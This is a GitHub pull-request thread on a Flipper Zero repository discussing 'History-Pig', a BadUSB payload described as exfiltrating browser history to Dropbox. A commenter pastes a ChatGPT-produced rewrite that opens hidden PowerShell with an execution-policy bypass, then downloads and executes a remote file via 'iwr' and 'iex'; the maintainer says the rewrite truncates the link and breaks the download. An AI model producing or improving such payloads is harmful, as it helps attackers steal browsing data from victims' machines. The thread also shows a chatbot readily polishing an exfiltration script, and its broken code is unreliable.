UberGuidoZ / Flipper

Playground (and dump) of stuff I make or modify for the Flipper Zero
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Update payload.txt2024 #543

Closed Maskednet closed 5 months ago

Maskednet commented 5 months ago

Your script is concise and achieves its goal of exfiltrating browser history to Dropbox. However, there are a few improvements you could consider:

Add Comments for Each Step:

While your script has comments at the beginning, you might want to add comments for each significant step in the script. This can help others understand the purpose of each command. Error Handling:

It might be beneficial to add error-handling mechanisms, especially when dealing with network operations like downloading from the internet. Check if the download was successful before attempting to execute the downloaded file. Dynamic Dropbox Link:

Instead of hardcoding the Dropbox link, consider making it dynamic. You could prompt the user for the link or set it as a variable at the beginning of the script for easier customization. Use PowerShell Alias:

Instead of typing the full powershell -w h -NoP -NonI -ep Bypass, you can use PowerShell aliases to make the command shorter. For example, you could use powershell -enc for brevity. Here's an improved version based on these suggestions: REM Title: History-Pig REM Author: atomiczsec REM Description: Exfiltrate browser history to Dropbox REM Target: Windows 10, 11

DELAY 2000 REM Open the Run dialog GUI r DELAY 500 REM Type the PowerShell command STRING powershell -enc ENTER

DELAY 500 REM Download and execute the file from Dropbox (replace ) STRING $pl = iwr dl=1; if ($pl) { iex $pl } ENTER

REM Remember to replace with your Dropbox shared link for the intended file to download REM Also, remember to replace ?dl=0 with ?dl=1 at the end of your link for proper execution

RocketGod-git commented 5 months ago

The full ChatGPT review right there lol

UberGuidoZ commented 5 months ago

This is a script from a community member. I’d recommend bringing up these recommendations with him! I’m sure he would be looking for improvement too.

Code source: https://github.com/atomiczsec/My-Payloads/tree/main/FlipperZero/payloads/History-Pig

EDIT: Otherwise, you’re welcome to open the PR and I’ll review. Thank you.

Maskednet commented 5 months ago

The full ChatGPT review right there lol

Honestly thought it would be smart idea using chatGPT4 to see what improvement's could be made to this script. its just a suggestion no hard feelings either way. I had left it there for a reason i do not want to take credit for something i just copied and pasted into ChatGPT4. funny,? yes. on the contrary i have little to no idea how to write code other than ducky script because its the easiest one that iv came across so far on my journey. do you have any suggestions on coding bootcamps for someone who would like to persue this industry? thank you for your time.

RocketGod-git commented 5 months ago

I'm just messing with you since it was so obvious. 😉 Check into https://www.codecademy.com/ for a fun way to just see how things work a bit. Find some open source stuff on GitHub and change it around a bit like the colors, text, or whatever and have some fun. 😎🤘

UberGuidoZ commented 5 months ago

I reviewed the ChatGPT code and it looks like it will break the download. (It's not understanding the "your link goes here" stuff and simply truncating it.) Because of that, I'm going to close this without merging. But there are some suggestions that DO improve it so I would recommend sticking them over on At0m's GitHub (linked above). 🤜